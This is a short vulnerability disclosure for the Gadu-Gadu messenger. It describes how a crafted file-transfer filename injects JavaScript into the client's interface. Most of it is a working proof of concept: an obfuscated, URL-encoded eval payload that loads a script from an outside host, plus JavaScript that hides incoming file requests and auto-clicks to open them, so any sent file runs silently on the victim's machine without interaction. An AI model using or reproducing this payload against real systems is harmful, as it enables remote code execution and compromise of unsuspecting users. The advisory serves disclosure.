Gadu-Gadu Code Execution / Cross Site Scripting

`Vendor: Gadu-Gadu (http://gadu-gadu.pl)  
Vulnerable Version: All  
Vulnerability Type: XSS, Remote Code Execution  
Risk level: Very High  
Credit: Kacper Szczesniak <[email protected]>  
Vulnerability Details:  
  
Gadu-Gadu improperly handles file transfer requests. It's possible to  
place 255 chars of HTML code (no slash) inside the filename. This can  
lead to injecting JavaScript into UI using crafted file-send-request  
packet. It's possible to trigger various actions from GUI JavaScript  
code such as saving and running any file on victim's host. Internal  
protocols are abused for these purposes. No 'security' mechanisms like  
ASLR or DEP will stop this attack because it's JS code. No user  
interaction needed.  
  
PoC:  
  
file name that loads external x.js code:  
<input onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);"  
autofocus>  
  
example x.js code to hide, accept and open every file request:  
  
document.getElementById('extra').innerHTML = '<style>.file,  
.entrySeparator{display:none;}</style>';  
n = document.getElementById('open_file');  
n.setAttribute('id', '');  
  
function ff(){  
if(f = document.getElementById('open_file')) {  
e = document.createEvent("HTMLEvents");  
e.initEvent('click', true, true);  
f.dispatchEvent(e);  
f.setAttribute('id', '');  
}  
setTimeout('ff()', 1000);  
}  
  
ff();  
  
Now you can just send any file and it'll be silently auto-download and executed  
  
kacper  
`